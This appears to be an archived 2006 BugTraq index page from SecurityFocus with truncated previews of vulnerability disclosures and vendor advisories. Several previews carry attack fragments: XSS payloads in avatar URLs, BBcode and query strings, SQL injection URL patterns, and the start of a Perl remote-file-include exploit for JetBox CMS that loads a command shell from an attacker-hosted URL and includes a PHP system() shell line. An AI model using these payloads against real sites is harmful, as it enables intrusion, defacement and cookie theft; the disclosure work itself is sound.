BugTraq Mode:
(Page 1152 of 1748)  < Prev  1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157  Next >
Firefox 1.5.0.3 code execution exploit 2006-05-05
yesn anon com
try this with Firefox 1.5.0.3

»www.gavinsharp.com/tmp/ImageVuln.html

[ more ]  [ reply ]
Re: Re: Invision Gallery 2.0.6 ( SQL Injection ) 2006-05-05
an0n netc com
I checked this yesterday night. The pass_hash is well retrieved, but modifying the pass_hash and the user id in the cookies (thanks to BurpSuite) does not affect the behaviour of the server... I might have done something wrong...

[ more ]  [ reply ]
Idle scan rediscovered!!! 2006-05-05
Joel Jose (joeljose420 gmail com)
hello world!,
the idle scan was just rediscovered in my lab while
i was trying to replicate a dos attack on a windowsxp ,linux(debian
sarge) and win2k workstations. I had thought that IDLE scan was a
closed chaper after the ipid0 and randomisations were applied( i think
Marco Ivald

[ more ]  [ reply ]
Alexadex.com players.py XSS Exploit 2006-05-05
skinnypuppy hushmail ai
+++++++++++++++++++++++++++++++++++++

|Alexadex.com players.py XSS Exploit|

+++++++++++++++++++++++++++++++++++++

May 04,2006

++++++++++++++++++++++++++++++++

|XSS Exploition on alexadex.com|

++++++++++++++++++++++++++++++++

http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPU

[ more ]  [ reply ]
Intel wireless service s24evmon.exe confidential information disclosure. 2006-05-02
ruben reversemode com
S24EvMon.exe is a service which is part (at least) of the Intel PROset/Wireless software. This application is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.

This service uses a shared memory section which is created without the proper security descript

[ more ]  [ reply ]
Re: DB_eSession deleteSession() SQL injection 2006-05-01
interact interactimpact com
I think the solution below is a better and safer approach.

replace addslashes() with mysql_real_escape_string()

$_sess_id_set = ( empty($_sess_id_set) ) ? NULL: mysql_real_escape_string($_sess_id_set);

[ more ]  [ reply ]
X7Chat <= 2.0.2 avatar XSS injection 2006-05-06
zerogue gmail com
X7Chat <= 2.0.2 avatar XSS injection

Discovered by: Nomenumbra

Date: 6/4/2006

impact:moderate (privilege escalation,possible defacement)

X7Chat versions 2.0.2 and below are prone to XSS injection in a user's avatar.

By setting this as the url of your avatar:

javascript:alert('xss')

yo

[ more ]  [ reply ]
WebsiteBaker CMS lack of sanitizing 2006-05-06
zerogue gmail com
WebsiteBaker CMS lack of sanitizing

Discovered by: Nomenumbra

Date: 6/4/2006

impact:moderate (privilege escalation,possible defacement)

A user's display name isn't filtered at all, allowing them to

insert any HTML of javascript code at will.

Nomenumbra/[0x4F4C]

[ more ]  [ reply ]
VisionSource CMS <= 0.6 XSS vectors 2006-05-06
zerogue gmail com
VisionSource CMS <= 0.6 XSS vectors

Discovered by: Nomenumbra

Date: 5/4/2006

impact:moderate (privilege escalation,possible defacement)

No data inside the user's profile is filtered thus allowing them to

embed malicious XSS vectors to potentially steal cookies.

Nomenumbra/[0x4F4C]

[ more ]  [ reply ]
[ GLSA 200605-06 ] Mozilla Firefox: Potential remote code execution 2006-05-06
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
PassMasterFlex (and PassMasterFlex+) XSS injection 2006-05-06
zerogue gmail com
PassMasterFlex (and PassMasterFlex+) XSS injection

Discovered by: Nomenumbra

Date: 5/4/2006

impact:moderate (privilege escalation,possible defacement)

PassMasterFlex(+) is a database-driven multiple login that utilizes cookies for authentication.

PassMasterFlex+ was written not only to pr

[ more ]  [ reply ]
myBloggie <= 2.1.3 XSS 2006-05-06
zerogue gmail com
myBloggie <= 2.1.3 XSS

Discovered by: Nomenumbra

Date: 6/4/2006

impact:moderate (privilege escalation,possible defacement)

MyBloggie versions 2.1.3 and below are vulnerable to XSS injection in the

image BBcode as follows:

[img]javascript:alert('xss')[/img]

Nomenumbra/[0x4F4C]

[ more ]  [ reply ]
FlexCustomer <= 0.0.4 sql injection 2006-05-06
zerogue gmail com
FlexCustomer <= 0.0.4 sql injection

Discovered by: Nomenumbra

Date: 6/4/2006

impact:high (privilege escalation,defacement)

FlexCustomer versions 0.0.4 and below are vulnerable to and SQL injection in the common user and admin-panel

login as follows (it really is SQL-injection 101 you know..

[ more ]  [ reply ]
ChipmunkBoard Multiple Attack vectors 2006-05-06
zerogue gmail com
ChipmunkBoard Multiple Attack vectors

Discovered by: Nomenumbra

Date: 6/4/2006

impact:high (privilege escalation,possible defacement)

It is possible to insert the following javascript in the BBcode or supply it as your avatar url:

javascript:alert(%27xss%27);

Also ChipmunkBoard is pron

[ more ]  [ reply ]
ChipmunkBlogger improper input sanitizing 2006-05-06
zerogue gmail com
ChipmunkBlogger improper input sanitizing

Discovered by: Nomenumbra

Date: 6/4/2006

impact:moderate (privilege escalation,possible defacement)

Posts (potentially made by lower-privilege members) and profile names aren't properly sanitized, thus resulting

in being vulnerable to the following

[ more ]  [ reply ]
JetBox CMS Remote File Include 2006-05-06
beford (xbefordx gmail com)
#!/usr/bin/perl

############

# JetBox CMS Remote File Include
# Exploit & Advisory: beford <xbefordx gmail com>

#
# uso:# perl own.pl <host> <cmd-shell-url> <cmd-var>

# perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
#

# cmd shell example: <? system($cmd); ?>

# cmd variable:

[ more ]  [ reply ]
OpenFAQ - HTML injection and XSS (Cross Site Scripting) 2006-05-06
Kamil Sienicki (K3 spelunca int pl)
Script: OpenFAQ
Version: 0.4.0 previous version probably too.
Language: PHP
Problem: HTML injection and XSS (Cross Site Scripting)
Vendor: http://sourceforge.net/projects/openfaq
Discovered by: Kamil 'K3' Sienicki

Description:
OpenFAQ is a PHP application that lets Webmasters
administrate a Freque

[ more ]  [ reply ]
[ GLSA 200605-05 ] rsync: Potential integer overflow 2006-05-06
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]
TSLSA-2006-0024 - multi 2006-05-05
Trustix Security Advisor (tsl trustix org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Trustix Secure Linux Security Advisory #2006-0024

Package names: clamav, cyrus-sasl, kernel, libtiff, rsync, xorg-x11
Summary: Multiple vulnerabilities
Date:

[ more ]  [ reply ]
Cryptomathic ActiveX Buffer Overflow (TDC Digital signature) 2006-05-05
CIRT.DK Advisory (advisory cirt dk)
A vulnerability has been found in an ActiveX object distributed as part of
TDC' Microsoft CSP suite.
The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects.
The primary task of the
CSP is to handle private RSA keys that are encrypted by keys derived from
the user provided
passwords

[ more ]  [ reply ]
Invision Community Blog .. Bugs 2006-05-05
o y 6 hotmail com
[LEFT]

Invision Community Blog .. Bugs

SQL Injection :-

Filename :- mod.php

Function name :- do_mmod()

The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection -->

* Arabic *

[/LEFT]

[RIGHT]

ÇáãÊÛíÑ $ids ÛíÑ ãÝáÊÑ Úä ØÑíÞ ÇáÏÇáå intval æåæ ÈÔßá ãÕÝæÝå .. áåÐ

[ more ]  [ reply ]
Re: ISA Server 2004 Log Manipulation 2006-05-05
Steven M. Christey (coley mitre org) (1 replies)

>There is a Log Manipulation vulnerability in Microsoft ISA Server
>2004, which when exploited will enable a malicious user to manipulate
>the Destination Host parameter of the log file.
...
>We were able to insert arbitrary characters, in this case the ASCII
>characters 1, 2, 3 (respectively) into

[ more ]  [ reply ]
Re: ISA Server 2004 Log Manipulation 2006-05-05
beSIRT (beSIRT beyondsecurity com)
[ MDKSA-2006:081-1 ] - Updated xorg-x11 packages fix vulnerability 2006-05-05
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:081-1
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]
modules name(Downloads)SQL Injection Exploit 2006-05-05
Mster-X hotmail com
********************

By: Mr-X

Email: Mster-X (at) hotmail (dot) com [email concealed]

Subject: modules name(Downloads)SQL Injection

********************

example:-

/modules.php?/modules.php?name=Downloads&d_op=viewdownload&cid=[SQL]

********************

[ more ]  [ reply ]
modules name(Sections)SQL Injection Exploit 2006-05-05
Mster-X hotmail com
********************

By: Mr-X

Email: Mster-X (at) hotmail (dot) com [email concealed]

Subject: modules name(Sections)SQL Injection

********************

example:-

/modules.php?name=Surveys&op=results&pollID=8&mode=&order=&thold=[SQL]

********************

[ more ]  [ reply ]
CuteNews 1.4.1 Multiple vulnerabilities 2006-05-05
k4p0k4p0 hotmail com
/*

---------------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST]® Advisory #20

---------------------------------------------------------------

Program : CuteNews 1.4.1

Homepage: http://www.cutephp.com

Vulnerable Versions: CuteNews 1.4.1 & lower ones

Risk: Med

[ more ]  [ reply ]
(Page 1152 of 1748)  < Prev  1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus